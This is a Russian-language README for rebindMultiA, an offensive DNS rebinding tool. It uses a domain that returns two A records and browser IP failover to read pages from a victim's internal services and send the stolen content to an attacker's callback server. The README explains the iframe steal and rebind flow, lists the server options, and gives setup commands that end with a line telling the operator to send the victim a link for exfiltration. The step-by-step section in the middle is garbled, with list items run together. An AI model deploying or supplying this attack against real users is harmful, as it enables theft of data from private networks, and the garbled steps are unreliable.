
Инструмент для атаки с перепривязкой DNS, использующий несколько A-записей для обхода политики одного источника и кражи данных из внутренних сетевых сервисов через поведение браузера при откате.
rebindMultiA — это инструмент для проведения атаки с множественными A-записями (Multiple A Record rebind attack).
rebindmultia.com — это домен, который я настроил для помощи в этих атаках. Он делает каждый IP-адрес собственным авторитетным сервером имен для домена [IP].ns.rebindmultia.com. Например, авторитетным сервером имен для 13.33.33.37.ns.rebindmultia.com является 13.33.33.37.ip.rebindmultia.com, который разрешается (как вы, возможно, догадались) в 13.33.33.37.
Атака MultiA Record Rebind — это вариант DNS-ребindingа, который использует возможность злоумышленника отвечать двумя IP-адресами на DNS-запрос, а также склонность браузера переключаться на второй IP-адрес в DNS-ответе, если первый не отвечает. В этой атаке злоумышленник настраивает вредоносный DNS-сервер и два вредоносных HTTP-сервера. DNS-сервер отвечает двумя A-записями:
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1
Браузер жертвы затем подключается к первому IP-адресу и начинает взаимодействовать с первым вредоносным HTTP-сервером злоумышленника. Этот сервер отвечает страницей, содержащей два iframe: один для /steal и один для /rebind. Iframe /steal загружает вредоносную страницу для доступа ко второму iframe и извлечения содержимого. Конечная точка /rebind при обращении выдает 302-редирект на / и завершает первый вредоносный HTTP-сервер. В результате, когда браузер снова обращается к HTTP-серверу злоумышленника, он обнаруживает закрытый порт. Вследствие этого он переключается на второй IP-адрес. Как только целевое содержимое загружено во второй iframe, первый iframe может получить к нему доступ, украсть данные и передать их на второй вредоносный HTTP-сервер злоумышленника — сервер обратного вызова.
Эта атака работает только в среде Windows. Linux и Mac по умолчанию используют частный IP-адрес первым, и сервер злоумышленника никогда не будет запрошен.

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com.server.py) парсит запрошенное DNS-имя и возвращает две A-записи: 13.33.33.37 и 127.0.0.1.server.py) и загружает страницу /parent, содержащую два iframe./steal с вредоносного HTTP-сервера злоумышленника./rebind, что приводит к 302-редиректу на / (HTTP-сервер завершится после этого запроса)./ в соответствии с 302 от сервера злоумышленника./ с (теперь неработающего) HTTP-сервера злоумышленника, но это не удается.127.0.0.1. После этого он подключается к этому серверу и загружает страницу в iframe.steal получает доступ к только что загруженному второму iframe и извлекает содержимое.steal затем отправляет результаты обратно на сервер обратного вызова злоумышленника.pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /
Если вы получите эту ошибку:
┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py
Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'
Тогда вам нужно использовать более новую версию Python. Python 3.7+.
Это должно выполняться с общедоступного IP-адреса.
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Отправьте свою жертву по ссылке http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent для эксфильтрации 127.0.0.1"
sudo python3 server.py